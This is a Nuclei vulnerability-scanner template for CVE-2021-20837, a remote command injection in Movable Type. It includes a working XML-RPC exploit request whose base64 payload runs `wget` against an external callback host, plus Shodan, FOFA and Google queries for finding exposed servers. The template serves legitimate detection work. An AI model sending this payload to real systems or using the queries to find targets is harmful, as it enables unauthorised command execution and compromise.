MovableType - Remote Command Injection
ID: CVE-2021-20837
Severity: critical
Author: dhiyaneshDK,hackergautam
Tags: cve2021,cve,packetstorm,rce,movable,sixapart
Description
MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
YAML Source
id: CVE-2021-20837

info:
  name: MovableType - Remote Command Injection
  author: dhiyaneshDK,hackergautam
  severity: critical
  description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType.
  reference:
    - https://nemesis.sh/posts/movable-type-0day/
    - https://github.com/ghost-nemesis/cve-2021-20837-poc
    - https://twitter.com/cyber_advising/status/1454051725904580608
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20837
    - http://packetstormsecurity.com/files/164818/Movable-Type-7-r.5002-XMLRPC-API-Remote-Command-Injection.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-20837
    cwe-id: CWE-78
    epss-score: 0.96998
    epss-percentile: 0.99738
    cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:*
  metadata:
    max-request: 1
    vendor: sixapart
    product: movable_type
    shodan-query:
      - http.title:"サインイン | movable type pro"
      - cpe:"cpe:2.3:a:sixapart:movable_type"
    fofa-query: title="サインイン | movable type pro"
    google-query: intitle:"サインイン | movable type pro"
  tags: cve2021,cve,packetstorm,rce,movable,sixapart

http:
  - raw:
      - |
        POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0" encoding="UTF-8"?>
        <methodCall>
          <methodName>mt.handler_to_coderef</methodName>
          <params>
            <param>
              <value>
                <base64>
                  {{base64("`wget http://{{interactsh-url}}`")}}
                </base64>
              </value>
            </param>
          </params>
        </methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        words:
          - "failed loading package"

      - type: status
        status:
          - 200
# digest: 490a0046304402206b4d67ccc7856a13631479e0517c158cdfa5962ead6b66ff4cd55158c3b78b420220151850f5746eec36d2f2e2b39adf5f13167ab1a42e4b52b5e5f3dd7383df2d36:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template checks a web application for CVE-2021-20837. Run it with the Nuclei scanner against a target URL:
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-20837.yaml"